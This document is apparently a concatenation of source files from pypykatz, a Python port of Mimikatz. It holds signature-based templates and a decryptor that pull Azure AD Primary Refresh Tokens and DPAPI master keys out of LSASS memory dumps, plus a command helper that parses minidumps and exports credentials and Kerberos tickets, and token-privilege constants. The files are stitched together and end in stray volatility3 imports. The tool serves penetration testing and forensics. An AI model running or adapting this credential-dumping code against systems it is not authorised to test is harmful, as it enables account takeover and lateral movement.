from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import ULONG, LUID, KIWI_GENERIC_PRIMARY_CREDENTIAL, POINTER, DWORD, PVOID, PSID, GUID, DWORD64
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class CloudapTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Cloudap')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None

	@staticmethod
	def get_template(sysinfo):
		template = CloudapTemplate()
		if sysinfo.buildnumber <= WindowsBuild.WIN_10_1903.value:
			return None

		if sysinfo.architecture == KatzSystemArchitecture.X64:
			template.signature = b'\x44\x8b\x01\x44\x39\x42'
			template.first_entry_offset = -9
			template.list_entry = PKIWI_CLOUDAP_LOGON_LIST_ENTRY
			if sysinfo.buildnumber > WindowsBuild.WIN_10_1903.value:
				template.list_entry = PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			template.signature = b'\x8b\x31\x39\x72\x10\x75'
			template.first_entry_offset = -8
			template.list_entry = PKIWI_CLOUDAP_LOGON_LIST_ENTRY

		else:
			raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		template.log_template('list_entry', template.list_entry)
		return template

class PKIWI_CLOUDAP_CACHE_UNK(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CLOUDAP_CACHE_UNK()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CLOUDAP_CACHE_UNK
		return p

class KIWI_CLOUDAP_CACHE_UNK:
	def __init__(self):
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unkSize = None
		self.guid = None
		self.unk = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CLOUDAP_CACHE_UNK()
		res.unk0 = await DWORD.load(reader)
		res.unk1 = await DWORD.load(reader)
		res.unk2 = await DWORD.load(reader)
		res.unkSize = await DWORD.loadvalue(reader)
		res.guid = await GUID.loadvalue(reader)
		res.unk = await reader.read(64)
		return res


class PKIWI_CLOUDAP_CACHE_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CLOUDAP_CACHE_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CLOUDAP_CACHE_LIST_ENTRY
		return p

class KIWI_CLOUDAP_CACHE_LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.LockList = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unkLogin0 = None
		self.unkLogin1 = None
		self.toname = None
		self.Sid = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.toDetermine = None
		self.unk14 = None
		self.cbPRT = None
		self.PRT = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CLOUDAP_CACHE_LIST_ENTRY()
		res.Flink = await PKIWI_CLOUDAP_CACHE_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_CLOUDAP_CACHE_LIST_ENTRY.load(reader)
		res.unk0 = await DWORD.load(reader)
		await reader.align()
		res.LockList = await PVOID.load(reader)
		res.unk1 = await PVOID.load(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.unk4 = await PVOID.load(reader)
		res.unk5 = await PVOID.load(reader)
		res.unk6 = await DWORD.load(reader)
		res.unk7 = await DWORD.load(reader)
		res.unk8 = await DWORD.load(reader)
		res.unk9 = await DWORD.load(reader)
		res.unkLogin0 = await PVOID.load(reader) #PCWSTR
		res.unkLogin1 = await PVOID.load(reader) #PCWSTR
		res.toname = await reader.read(130)  #wchar_t [64 + 1];
		await reader.align()
		res.Sid = await PSID.loadvalue(reader)
		res.unk10 = await DWORD.load(reader)
		res.unk11 = await DWORD.load(reader)
		res.unk12 = await DWORD.load(reader)
		res.unk13 = await DWORD.load(reader)
		res.toDetermine = await PKIWI_CLOUDAP_CACHE_UNK.load(reader)
		res.unk14 = await PVOID.load(reader)
		res.cbPRT = await DWORD.loadvalue(reader)
		await reader.align()
		res.PRT = await PVOID.load(reader) #PBYTE(reader)
		return res

class PKIWI_CLOUDAP_LOGON_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CLOUDAP_LOGON_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CLOUDAP_LOGON_LIST_ENTRY
		return p

class KIWI_CLOUDAP_LOGON_LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.LocallyUniqueIdentifier = None
		self.unk2 = None
		self.unk3 = None
		self.cacheEntry = None

	@staticmethod
	async def load(reader):
		res = KIWI_CLOUDAP_LOGON_LIST_ENTRY()
		res.Flink = await PKIWI_CLOUDAP_LOGON_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_CLOUDAP_LOGON_LIST_ENTRY.load(reader)
		res.unk0 = await DWORD.load(reader)
		res.unk1 = await DWORD.load(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.unk2 = await DWORD64.load(reader)
		res.unk3 = await DWORD64.load(reader)
		res.cacheEntry = await PKIWI_CLOUDAP_CACHE_LIST_ENTRY.load(reader)
		return res

class PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2
		return p

class KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.LocallyUniqueIdentifier = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.cacheEntry = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2()
		res.Flink = await PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.load(reader)
		res.Blink = await PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.load(reader)
		res.unk0 = await DWORD.load(reader)
		res.unk1 = await DWORD.load(reader)
		res.unk2 = await DWORD.load(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.unk3 = await DWORD.load(reader)
		await reader.align()
		res.unk4 = await DWORD64.load(reader)
		res.unk5 = await DWORD64.load(reader)
		res.cacheEntry = await PKIWI_CLOUDAP_CACHE_LIST_ENTRY.load(reader)
		return res



import math

class FileSection:
	def __init__(self, startpos, data):
		self.startpos = startpos
		self.endpos = startpos + len(data)
		self.data = data

	def inrange(self, start, size):
		if start >= self.startpos and (start+size) <= self.endpos:
			return True
		return False
	
	def read(self, start, size):
		return self.data[ start - self.startpos : (start - self.startpos) + size]

class SMBFileReader:
	def __init__(self, smbfile):
		self.smbfile = smbfile
		self.cache = []
		self.curpos = 0

	async def open(self, connection, mode = 'r'):
		return await self.smbfile.open(connection, mode=mode)
		 

	async def read(self, n = -1):
		#print('read %s' % n)
		if n == 0:
			return b''

		if n != -1:
			for section in self.cache:
				if section.inrange(self.curpos, n) is True:
					#print(n)
					data = section.read(self.curpos, n)					
					#print(data)
					await self.seek(n, 1)
					return data

		#print('CACHE MISS!')
		# requested data not found in cache, this case we will read a larger chunk than requested and store it in memory
		# since reading more data skews the current position we will need to reset the position by calling seek with the correct pos

		readsize = min(self.smbfile.maxreadsize, self.smbfile.size)
		buffer = b''

		# this is needed bc sometimes the readsize is smaller than the requested amount
		for _ in range(int(math.ceil(n/readsize))):
			data, err = await self.smbfile.read(readsize)
			if err is not None:
				raise err
			buffer += data
		
		section = FileSection(self.curpos, buffer)
		self.cache.append(section)
		
		data = section.read(self.curpos, n)
		await self.seek(self.curpos + n, 0)
		return data
	
	async def close(self):
		return await self.smbfile.close()
	
	async def delete(self):
		return await self.smbfile.delete()
	
	def tell(self):
		return self.curpos
	
	async def seek(self, n, whence = 0):
		#print('seek %s %s' % (whence, n))
		_, err = await self.smbfile.seek(n, whence)
		if err is not None:
			raise err
		self.curpos = self.smbfile.tell()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import json
import glob
import ntpath
import traceback
import asyncio
import base64

from pypykatz import logger
from pypykatz.apypykatz import apypykatz
from pypykatz.commons.common import UniversalEncoder
from pypykatz.alsadecryptor.packages.msv.decryptor import LogonSession



class LSACMDHelper:
	def __init__(self):
		self.live_keywords = ['lsa']
		self.keywords = ['lsa']
		
	def add_args(self, parser, live_parser):
		group = parser.add_parser('lsa', help='Get secrets from memory dump')
		group.add_argument('cmd', choices=['minidump','rekall'])
		group.add_argument('memoryfile', help='path to the dump file')
		group.add_argument('-t','--timestamp_override', type=int, help='enforces msv timestamp override (0=normal, 1=anti_mimikatz)')
		group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing')
		group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder')
		group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap'], nargs="+", default = 'all', help = 'LSASS package to parse')

		
	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			asyncio.run(self.run(args))
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
			
	def process_results(self, results, files_with_error, args):
		if args.outfile and args.json:
			with open(args.outfile, 'w') as f:
				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)

		elif args.outfile and args.grep:
			with open(args.outfile, 'w', newline = '') as f:
				f.write(':'.join(LogonSession.grep_header) + '\r\n')
				for result in results:
					for luid in results[result].logon_sessions:
						for row in results[result].logon_sessions[luid].to_grep_rows():
							f.write(':'.join(row) + '\r\n')
		
		elif args.outfile:
			with open(args.outfile, 'w') as f:
				for result in results:
					f.write('FILE: ======== %s =======\n' % result)
					
					for luid in results[result].logon_sessions:
						f.write('\n'+str(results[result].logon_sessions[luid]))
					
					if len(results[result].orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in results[result].orphaned_creds:
							f.write(str(cred))
					
				if len(files_with_error) > 0:
					f.write('\n== Failed to parse these files:\n')
					for filename in files_with_error:
						f.write('%s\n' % filename)
						
		elif args.json:
			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
		
		elif args.grep:
			if args.directory:
				print(':'.join(['filename'] + LogonSession.grep_header))
			else:
				print(':'.join(LogonSession.grep_header))
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						if args.directory:
							row = [result] + row
						print(':'.join(row))
				for cred in results[result].orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] != 'dpapi':
						if t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							if args.directory:
								x = [result] + x
							print(':'.join(x))
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						if args.directory:
							x = [result] + x
						print(':'.join(x))

				for pkg, err in results[result].errors:
					err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
					err_str = base64.b64encode(err_str.encode()).decode()
					x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str]
					if args.directory:
						x = [result] + x
					print(':'.join(x) + '\r\n')

		else:
			for result in results:
				print('FILE: ======== %s =======' % result)	
				if isinstance(results[result], str):
					print(results[result])
				else:
					for luid in results[result].logon_sessions:
						print(str(results[result].logon_sessions[luid]))
							
					if len(results[result].orphaned_creds) > 0:
						print('== Orphaned credentials ==')
						for cred in results[result].orphaned_creds:
							print(str(cred))
					
					if len(results[result].errors) > 0:
						print('== Errors ==')
						for pkg, err in results[result].errors:
							err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
							err_str = base64.b64encode(err_str.encode()).decode()
							print('%s %s' % (pkg+'_exception_please_report',err_str))
					

			if len(files_with_error) > 0:			
				print('\n==== Parsing errors:')
				for filename in files_with_error:
					print(filename)
		
		
		if args.kerberos_dir:
			dir = os.path.abspath(args.kerberos_dir)
			logger.info('Writing kerberos tickets to %s' % dir)
			for filename in results:
				base_filename = ntpath.basename(filename)
				ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
				results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
				for luid in results[filename].logon_sessions:
					for kcred in results[filename].logon_sessions[luid].kerberos_creds:
						for ticket in kcred.tickets:
							ticket.to_kirbi(dir)
							
				for cred in results[filename].orphaned_creds:
					if cred.credtype == 'kerberos':
						for ticket in cred.tickets:
							ticket.to_kirbi(dir)
		
	def run_live(self, args):
		return
			
	async def run(self, args):
		files_with_error = []
		results = {}
		###### Minidump
		if args.cmd == 'minidump':
			if args.directory:
				dir_fullpath = os.path.abspath(args.memoryfile)
				for file_pattern in ['*.dmp', '*.DMP']:
					if args.recursive == True:
						globdata = os.path.join(dir_fullpath, '**', file_pattern)
					else:
						globdata = os.path.join(dir_fullpath, file_pattern)
					
					logger.info('Parsing folder %s' % dir_fullpath)
					for filename in glob.glob(globdata, recursive=args.recursive):
						logger.info('Parsing file %s' % filename)
						try:
							mimi = await apypykatz.parse_minidump_file(filename, packages = args.packages)
							results[filename] = mimi
						except Exception as e:
							files_with_error.append(filename)
							logger.exception('Error parsing file %s ' % filename)
							if args.halt_on_error == True:
								raise e
							else:
								pass
					
			else:
				logger.info('Parsing file %s' % args.memoryfile)
				try:
					mimi = await apypykatz.parse_minidump_file(args.memoryfile, packages = args.packages)
					results[args.memoryfile] = mimi
				except Exception as e:
					logger.exception('Error while parsing file %s' % args.memoryfile)
					if args.halt_on_error == True:
						raise e
					else:
						traceback.print_exc()
						
		self.process_results(results, files_with_error, args)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from .credman.templates import *
from .dpapi.templates import *
from .dpapi.decryptor import *
from .kerberos.templates import *
from .kerberos.decryptor import *
from .livessp.templates import *
from .livessp.decryptor import *
from .msv.templates import *
from .msv.decryptor import *
from .ssp.templates import *
from .ssp.decryptor import *
from .tspkg.templates import *
from .tspkg.decryptor import *
from .wdigest.templates import *
from .wdigest.decryptor import *
from .cloudap.templates import *
from .cloudap.decryptor import *

__credman__ = ['CredmanTemplate']
__dpapi__ = ['DpapiTemplate', 'DpapiDecryptor', 'DpapiCredential']
__kerberos__ = ['KerberosTemplate','KerberosDecryptor']
__msv__ = ['MsvTemplate', 'MsvDecryptor', 'MsvCredential']
__ssp__ = ['SspTemplate', 'SspDecryptor', 'SspCredential']
__livessp__ = ['LiveSspTemplate', 'LiveSspDecryptor', 'LiveSspCredential']
__tspkg__ = ['TspkgTemplate', 'TspkgDecryptor', 'TspkgCredential']
__wdigest__ = ['WdigestTemplate','WdigestDecryptor','WdigestCredential']
__cloudap__ = ['CloudapTemplate', 'CloudapDecryptor','CloudapCredential']


#__kerberos__
__all__ = __cloudap__ + __credman__ + __dpapi__  + __msv__ + __ssp__ + __livessp__ + __tspkg__ + __wdigest__ + __kerberos__


import json
import hashlib
from pypykatz.alsadecryptor.package_commons import PackageDecryptor

class CloudapCredential:
	def __init__(self):
		self.credtype = 'cloudap'
		self.luid = None
		self.sid = None
		self.cachedir = None
		self.PRT = None
		self.key_guid = None
		self.dpapi_key = None
		self.dpapi_key_sha1 = None
	
	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['cachedir'] = self.cachedir
		t['PRT'] = self.PRT
		t['key_guid'] = self.key_guid
		t['dpapi_key'] = self.dpapi_key
		t['dpapi_key_sha1'] = self.dpapi_key_sha1
		return t

	def get_masterkey_hex(self):
		return self.dpapi_key.hex() if isinstance(self.dpapi_key, bytes) else self.dpapi_key
		
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== Cloudap [%x]==\n' % self.luid
		t += '\t\tcachedir %s\n' % self.cachedir
		t += '\t\tPRT %s\n' % self.PRT
		t += '\t\tkey_guid %s\n' % self.key_guid
		t += '\t\tdpapi_key %s\n' % self.get_masterkey_hex()
		t += '\t\tdpapi_key_sha1 %s\n' % self.dpapi_key_sha1
		return t

class CloudapDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, sysinfo):
		super().__init__('Cloudap', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credentials = []

	async def find_first_entry(self):
		position = await self.find_signature('cloudAP.dll',self.decryptor_template.signature)
		ptr_entry_loc = await self.reader.get_ptr_with_offset(position + self.decryptor_template.first_entry_offset)
		ptr_entry = await self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc

	async def add_entry(self, cloudap_entry):
		try:
			cred = CloudapCredential()
			cred.luid = cloudap_entry.LocallyUniqueIdentifier

			if cloudap_entry.cacheEntry is None or cloudap_entry.cacheEntry.value == 0:
				return
			cache = await cloudap_entry.cacheEntry.read(self.reader)
			cred.cachedir = cache.toname.decode('utf-16-le').replace('\x00','')
			if cache.cbPRT != 0 and cache.PRT.value != 0:
				ptr_enc = await cache.PRT.read_raw(self.reader, cache.cbPRT)
				temp, raw_dec = self.decrypt_password(ptr_enc, bytes_expected=True, segment_size=8)
				try:
					temp = temp.decode()
				except:
					pass
				
				cred.PRT = str(temp)
				
			if cache.toDetermine != 0:
				unk = await cache.toDetermine.read(self.reader)
				if unk is not None:
					cred.key_guid = unk.guid
					cred.dpapi_key, raw_dec = self.decrypt_password(unk.unk, bytes_expected = True)
					cred.dpapi_key_sha1 = hashlib.sha1(cred.dpapi_key).hexdigest()

			if cred.PRT is None and cred.key_guid is None:
				return
			self.credentials.append(cred)
		except Exception as e:
			self.log('CloudAP entry parsing error! Reason %s' % e)
			
	
	async def start(self):
		try:
			entry_ptr_value, entry_ptr_loc = await self.find_first_entry()
		except Exception as e:
			self.log('Failed to find list entry! Reason: %s' % e)
			return
		
		await self.reader.move(entry_ptr_loc)
		entry_ptr = await self.decryptor_template.list_entry.load(self.reader)
		await self.walk_list(entry_ptr, self.add_entry)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_OPERATION = 0x0008
PROCESS_CREATE_THREAD = 0x0002

# Standard access rights
DELETE                           = 0x00010000
READ_CONTROL                     = 0x00020000
WRITE_DAC                        = 0x00040000
WRITE_OWNER                      = 0x00080000
SYNCHRONIZE                      = 0x00100000
STANDARD_RIGHTS_REQUIRED         = 0x000F0000
STANDARD_RIGHTS_READ             = READ_CONTROL
STANDARD_RIGHTS_WRITE            = READ_CONTROL
STANDARD_RIGHTS_EXECUTE          = READ_CONTROL
STANDARD_RIGHTS_ALL              = 0x001F0000
SPECIFIC_RIGHTS_ALL              = 0x0000FFFF


#--- Constants ----------------------------------------------------------------

privnames = {
	"SE_ASSIGNPRIMARYTOKEN_NAME" : "SeAssignPrimaryTokenPrivilege",
	"SE_AUDIT_NAME" : "SeAuditPrivilege",
	"SE_BACKUP_NAME" : "SeBackupPrivilege",
	"SE_CHANGE_NOTIFY_NAME" : "SeChangeNotifyPrivilege",
	"SE_CREATE_GLOBAL_NAME" : "SeCreateGlobalPrivilege",
	"SE_CREATE_PAGEFILE_NAME" : "SeCreatePagefilePrivilege",
	"SE_CREATE_PERMANENT_NAME" : "SeCreatePermanentPrivilege",
	"SE_CREATE_SYMBOLIC_LINK_NAME" : "SeCreateSymbolicLinkPrivilege",
	"SE_CREATE_TOKEN_NAME" : "SeCreateTokenPrivilege",
	"SE_DEBUG_NAME" : "SeDebugPrivilege",
	"SE_ENABLE_DELEGATION_NAME" : "SeEnableDelegationPrivilege",
	"SE_IMPERSONATE_NAME" : "SeImpersonatePrivilege",
	"SE_INC_BASE_PRIORITY_NAME" : "SeIncreaseBasePriorityPrivilege",
	"SE_INCREASE_QUOTA_NAME" : "SeIncreaseQuotaPrivilege",
	"SE_INC_WORKING_SET_NAME" : "SeIncreaseWorkingSetPrivilege",
	"SE_LOAD_DRIVER_NAME" : "SeLoadDriverPrivilege",
	"SE_LOCK_MEMORY_NAME" : "SeLockMemoryPrivilege",
	"SE_MACHINE_ACCOUNT_NAME" : "SeMachineAccountPrivilege",
	"SE_MANAGE_VOLUME_NAME" : "SeManageVolumePrivilege",
	"SE_PROF_SINGLE_PROCESS_NAME" : "SeProfileSingleProcessPrivilege",
	"SE_RELABEL_NAME" : "SeRelabelPrivilege",
	"SE_REMOTE_SHUTDOWN_NAME" : "SeRemoteShutdownPrivilege",
	"SE_RESTORE_NAME" : "SeRestorePrivilege",
	"SE_SECURITY_NAME" : "SeSecurityPrivilege",
	"SE_SHUTDOWN_NAME" : "SeShutdownPrivilege",
	"SE_SYNC_AGENT_NAME" : "SeSyncAgentPrivilege",
	"SE_SYSTEM_ENVIRONMENT_NAME" : "SeSystemEnvironmentPrivilege",
	"SE_SYSTEM_PROFILE_NAME" : "SeSystemProfilePrivilege",
	"SE_SYSTEMTIME_NAME" : "SeSystemtimePrivilege",
	"SE_TAKE_OWNERSHIP_NAME" : "SeTakeOwnershipPrivilege",
	"SE_TCB_NAME" : "SeTcbPrivilege",
	"SE_TIME_ZONE_NAME" : "SeTimeZonePrivilege",
	"SE_TRUSTED_CREDMAN_ACCESS_NAME" : "SeTrustedCredManAccessPrivilege",
	"SE_UNDOCK_NAME" : "SeUndockPrivilege",
	"SE_UNSOLICITED_INPUT_NAME" : "SeUnsolicitedInputPrivilege"
}

# Privilege constants
SE_ASSIGNPRIMARYTOKEN_NAME	  = "SeAssignPrimaryTokenPrivilege"
SE_AUDIT_NAME				   = "SeAuditPrivilege"
SE_BACKUP_NAME				  = "SeBackupPrivilege"
SE_CHANGE_NOTIFY_NAME		   = "SeChangeNotifyPrivilege"
SE_CREATE_GLOBAL_NAME		   = "SeCreateGlobalPrivilege"
SE_CREATE_PAGEFILE_NAME		 = "SeCreatePagefilePrivilege"
SE_CREATE_PERMANENT_NAME		= "SeCreatePermanentPrivilege"
SE_CREATE_SYMBOLIC_LINK_NAME	= "SeCreateSymbolicLinkPrivilege"
SE_CREATE_TOKEN_NAME			= "SeCreateTokenPrivilege"
SE_DEBUG_NAME				   = "SeDebugPrivilege"
SE_ENABLE_DELEGATION_NAME	   = "SeEnableDelegationPrivilege"
SE_IMPERSONATE_NAME			 = "SeImpersonatePrivilege"
SE_INC_BASE_PRIORITY_NAME	   = "SeIncreaseBasePriorityPrivilege"
SE_INCREASE_QUOTA_NAME		  = "SeIncreaseQuotaPrivilege"
SE_INC_WORKING_SET_NAME		 = "SeIncreaseWorkingSetPrivilege"
SE_LOAD_DRIVER_NAME			 = "SeLoadDriverPrivilege"
SE_LOCK_MEMORY_NAME			 = "SeLockMemoryPrivilege"
SE_MACHINE_ACCOUNT_NAME		 = "SeMachineAccountPrivilege"
SE_MANAGE_VOLUME_NAME		   = "SeManageVolumePrivilege"
SE_PROF_SINGLE_PROCESS_NAME	 = "SeProfileSingleProcessPrivilege"
SE_RELABEL_NAME				 = "SeRelabelPrivilege"
SE_REMOTE_SHUTDOWN_NAME		 = "SeRemoteShutdownPrivilege"
SE_RESTORE_NAME				 = "SeRestorePrivilege"
SE_SECURITY_NAME				= "SeSecurityPrivilege"
SE_SHUTDOWN_NAME				= "SeShutdownPrivilege"
SE_SYNC_AGENT_NAME			  = "SeSyncAgentPrivilege"
SE_SYSTEM_ENVIRONMENT_NAME	  = "SeSystemEnvironmentPrivilege"
SE_SYSTEM_PROFILE_NAME		  = "SeSystemProfilePrivilege"
SE_SYSTEMTIME_NAME			  = "SeSystemtimePrivilege"
SE_TAKE_OWNERSHIP_NAME		  = "SeTakeOwnershipPrivilege"
SE_TCB_NAME					 = "SeTcbPrivilege"
SE_TIME_ZONE_NAME			   = "SeTimeZonePrivilege"
SE_TRUSTED_CREDMAN_ACCESS_NAME  = "SeTrustedCredManAccessPrivilege"
SE_UNDOCK_NAME				  = "SeUndockPrivilege"
SE_UNSOLICITED_INPUT_NAME	   = "SeUnsolicitedInputPrivilege"

SE_CREATE_TOKEN = 2
SE_ASSIGNPRIMARYTOKEN = 3
SE_LOCK_MEMORY=4
SE_INCREASE_QUOTA=5
SE_UNSOLICITED_INPUT=6
SE_TCB=7
SE_SECURITY=8
SE_TAKE_OWNERSHIP=9
SE_LOAD_DRIVER=10
SE_SYSTEM_PROFILE=11
SE_SYSTEMTIME=12
SE_PROF_SINGLE_PROCESS=13
SE_INC_BASE_PRIORITY=14
SE_CREATE_PAGEFILE=15
SE_CREATE_PERMANENT=16
SE_BACKUP=17
SE_RESTORE=18
SE_SHUTDOWN=19
SE_DEBUG=20
SE_AUDIT=21
SE_SYSTEM_ENVIRONMENT=22
SE_CHANGE_NOTIFY=23
SE_REMOTE_SHUTDOWN=24
SE_UNDOCK=25
SE_SYNC_AGENT=26
SE_ENABLE_DELEGATION=27
SE_MANAGE_VOLUME=28
SE_IMPERSONATE=29
SE_CREATE_GLOBAL=30
SE_TRUSTED_CREDMAN_ACCESS=31
SE_RELABEL=32
SE_INC_WORKING_SET=33
SE_TIME_ZONE=34
SE_CREATE_SYMBOLIC_LINK=35

SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED			= 0x00000002
SE_PRIVILEGE_REMOVED			= 0x00000004
SE_PRIVILEGE_USED_FOR_ACCESS	= 0x80000000

TOKEN_ADJUST_PRIVILEGES		 = 0x00000020

LOGON_WITH_PROFILE			  = 0x00000001
LOGON_NETCREDENTIALS_ONLY	   = 0x00000002

# Token access rights
TOKEN_ASSIGN_PRIMARY	= 0x0001
TOKEN_DUPLICATE		 = 0x0002
TOKEN_IMPERSONATE	   = 0x0004
TOKEN_QUERY			 = 0x0008
TOKEN_QUERY_SOURCE	  = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS	 = 0x0040
TOKEN_ADJUST_DEFAULT	= 0x0080
TOKEN_ADJUST_SESSIONID  = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
		TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
		TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
		TOKEN_ADJUST_SESSIONID)

#dont ask me...
TOKEN_MANIP_ACCESS = (TOKEN_QUERY | TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_QUERY_SOURCE | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | (131072 | 4))


# typedef enum _SECURITY_IMPERSONATION_LEVEL {
#   SecurityAnonymous,
#   SecurityIdentification,
#   SecurityImpersonation,
#   SecurityDelegation
# } SECURITY_IMPERSONATION_LEVEL, *PSECURITY_IMPERSONATION_LEVEL;

SecurityAnonymous	   = 0
SecurityIdentification  = 1
SecurityImpersonation   = 2
SecurityDelegation	  = 3

TokenPrimary		= 1
TokenImpersonation  = 2

# Predefined HKEY values
HKEY_CLASSES_ROOT	   = 0x80000000
HKEY_CURRENT_USER	   = 0x80000001
HKEY_LOCAL_MACHINE	  = 0x80000002
HKEY_USERS			  = 0x80000003
HKEY_PERFORMANCE_DATA   = 0x80000004
HKEY_CURRENT_CONFIG	 = 0x80000005

# Registry access rights
KEY_ALL_ACCESS		  = 0xF003F
KEY_CREATE_LINK		 = 0x0020
KEY_CREATE_SUB_KEY	  = 0x0004
KEY_ENUMERATE_SUB_KEYS  = 0x0008
KEY_EXECUTE			 = 0x20019
KEY_NOTIFY			  = 0x0010
KEY_QUERY_VALUE		 = 0x0001
KEY_READ				= 0x20019
KEY_SET_VALUE		   = 0x0002
KEY_WOW64_32KEY		 = 0x0200
KEY_WOW64_64KEY		 = 0x0100
KEY_WRITE			   = 0x20006

# Registry value types
REG_NONE						= 0
REG_SZ						  = 1
REG_EXPAND_SZ				   = 2
REG_BINARY					  = 3
REG_DWORD					   = 4
REG_DWORD_LITTLE_ENDIAN		 = REG_DWORD
REG_DWORD_BIG_ENDIAN			= 5
REG_LINK						= 6
REG_MULTI_SZ					= 7
REG_RESOURCE_LIST			   = 8
REG_FULL_RESOURCE_DESCRIPTOR	= 9
REG_RESOURCE_REQUIREMENTS_LIST  = 10
REG_QWORD					   = 11
REG_QWORD_LITTLE_ENDIAN		 = REG_QWORD


from typing import List

from volatility3.framework import interfaces, constants, exceptions, symbols
from volatility3.framework import renderers
